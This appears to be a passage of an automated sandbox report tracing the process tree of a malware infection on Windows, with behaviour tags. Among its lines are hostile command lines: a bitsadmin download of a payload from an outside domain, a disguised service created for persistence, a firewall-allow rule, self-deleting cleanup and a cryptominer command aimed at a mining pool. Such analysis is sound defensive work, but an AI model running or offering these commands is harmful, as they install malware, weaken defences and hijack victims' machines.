        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:9132
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
        15⤵
        Download via BitsAdmin
        
        PID:7380
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        15⤵
        Drops file in Program Files directory
        
        PID:7252
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        15⤵
        
        PID:6584
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:5820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:9176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:6732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:4816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        15⤵
        
        PID:4384
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        16⤵
        Drops file in System32 directory
        
        PID:8712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:9088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:8856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsz7ABD.tmp\tempfile.ps1"
        15⤵
        
        PID:4664
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        15⤵
        
        PID:7096
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boxt0cpw.edg\GcleanerWW.exe /mixone & exit
        13⤵
        
        PID:7460
        
        C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
        9⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Roaming\6368462.exe
        
        "C:\Users\Admin\AppData\Roaming\6368462.exe"
        10⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Roaming\8933555.exe
        
        "C:\Users\Admin\AppData\Roaming\8933555.exe"
        10⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:6516
        
        C:\Users\Admin\AppData\Roaming\5617989.exe
        
        "C:\Users\Admin\AppData\Roaming\5617989.exe"
        10⤵
        
        PID:1772
        
        C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
        
        "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
        9⤵
        
        PID:7116
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
        10⤵
        
        PID:7340
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im RunWW.exe /f
        11⤵
        Kills process with taskkill
        
        PID:7944
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        11⤵
        Delays execution with timeout.exe
        
        PID:8624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe & exit
        5⤵
        
        PID:5936
      - C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
        6⤵
        
        PID:1128
        
        C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4aia552r.1sd\google-game.exe" -a
        7⤵
        
        PID:4304
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkswjkle.nxl\jhuuee.exe & exit
        5⤵
        
        PID:900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe & exit
        5⤵
        
        PID:4384
      - C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
        6⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\q1rpda2d.dog\app.exe"
        7⤵
        Modifies data under HKEY_USERS
        
        PID:7900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe & exit
        5⤵
        
        PID:5860
      - C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe
        
        C:\Users\Admin\AppData\Local\Temp\an4qve0s.3vi\askinstall46.exe
        6⤵
        
        PID:3512
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        7⤵
        
        PID:4724
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        8⤵
        Kills process with taskkill
        
        PID:6772
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe & exit
        5⤵
        
        PID:8308
      - C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe
        
        C:\Users\Admin\AppData\Local\Temp\22z30w1a.f44\note8876.exe
        6⤵
        Checks whether UAC is enabled
        
        PID:7296
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe & exit
        5⤵
        
        PID:2396
      - C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
        6⤵
        
        PID:8276
        
        C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\311x3li5.g5u\toolspab1.exe
        7⤵
        Checks SCSI registry key(s)
        
        PID:8268
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S & exit
        5⤵
        
        PID:9184
      - C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\ruzttkia.nte\SunLabsPlayer.exe /S
        6⤵
        Drops file in Program Files directory
        
        PID:8648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        Blocklisted process makes network request
        Checks processor information in registry
        
        PID:7116
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:6024
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:9104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:9136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:7080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        Checks for any installed AV software in registry
        
        PID:8536
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
        7⤵
        Download via BitsAdmin
        
        PID:4728
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pciPvfgZyUkzN4QM -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        Drops file in Program Files directory
        
        PID:7544
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ppEffkJZ45294Dbr -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        7⤵
        
        PID:6740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:8532
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Checks for any installed AV software in registry
        
        PID:9132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:8332
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:8028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        7⤵
        
        PID:8888
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll" QRIvBFx
        8⤵
        Drops file in System32 directory
        
        PID:7000
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        Drops file in Program Files directory
        
        PID:8088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        Drops file in System32 directory
        
        PID:5384
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:9064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:5344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsp6D7F.tmp\tempfile.ps1"
        7⤵
        
        PID:8448
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        7⤵
        
        PID:7312
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4500
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ak51mapg.3ij\GcleanerWW.exe /mixone & exit
        5⤵
        Blocklisted process makes network request
        Modifies data under HKEY_USERS
        
        PID:1828

C:\Users\Admin\AppData\Local\Temp\4AEF.exe
C:\Users\Admin\AppData\Local\Temp\4AEF.exe
1⤵
PID:6820
- C:\Users\Admin\AppData\Local\Temp\4AEF.exe
  "C:\Users\Admin\AppData\Local\Temp\4AEF.exe"
  2⤵
  PID:1828

C:\Users\Admin\AppData\Local\Temp\4D22.exe
C:\Users\Admin\AppData\Local\Temp\4D22.exe
1⤵
PID:6480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ttwidmrg\
  2⤵
  PID:5156
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\peiqysd.exe" C:\Windows\SysWOW64\ttwidmrg\
  2⤵
  PID:2324
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create ttwidmrg binPath= "C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d\"C:\Users\Admin\AppData\Local\Temp\4D22.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:5936
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description ttwidmrg "wifi internet conection"
  2⤵
  PID:988
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start ttwidmrg
  2⤵
  PID:4992
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:4476

C:\Users\Admin\AppData\Local\Temp\54D4.exe
C:\Users\Admin\AppData\Local\Temp\54D4.exe
1⤵
PID:2736
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:4148
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:5148

C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe
C:\Windows\SysWOW64\ttwidmrg\peiqysd.exe /d"C:\Users\Admin\AppData\Local\Temp\4D22.exe"
1⤵
PID:6576
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  PID:3696
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:7244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5444

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:4320

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4952
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4952 -s 1668
  2⤵
  - Program crash
  PID:6028

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:6708
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:1028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5476

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5644
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 5644 -s 2880
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:5440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
1⤵
PID:7152

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5612
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:4412

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:7232

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:2736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8644

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:9100

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:636

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:6584

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8864

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:9140
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:9088

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:4912
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:4764

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
PID:5880
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:9204
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 9204 -s 616
    3⤵
    - Program crash
    PID:5220

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
1⤵
PID:4216

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
- Suspicious use of SetThreadContext
PID:8276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:8412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:8568

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6580

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4148

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6072

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8484

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5480

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5184

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6140

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4984
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4984 -s 1212
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:9088

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:7120

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
